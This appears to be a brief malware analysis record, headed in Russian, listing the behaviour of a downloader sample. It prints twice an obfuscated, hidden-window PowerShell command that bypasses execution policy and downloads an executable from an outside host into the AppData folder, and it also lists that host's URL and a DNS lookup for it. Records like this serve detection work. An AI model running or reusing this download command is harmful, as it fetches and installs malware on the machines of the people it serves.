Техническая информация
- http://unityrulesyur.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWersHell.exE -exECutIonpoliCy byPAss -NoPROfILe -WindowSTYlE hiDdEN (New-oBjEcT SYStEM.nEt.webcLiENt).DownlOADfILe('http://unityrulesyur.top/search.php','%aPpdATa%.EXE');...
- DNS ASK un####ulesyur.top
- '<SYSTEM32>\cmd.exe' /c "POWersHell.exE -exECutIonpoliCy byPAss -NoPROfILe -WindowSTYlE hiDdEN (New-oBjEcT SYStEM.nEt.webcLiENt).DownlOADfILe('http://unityrulesyur.top/search.php','%aPpdATa%.EXE');...' (со скрытым окном)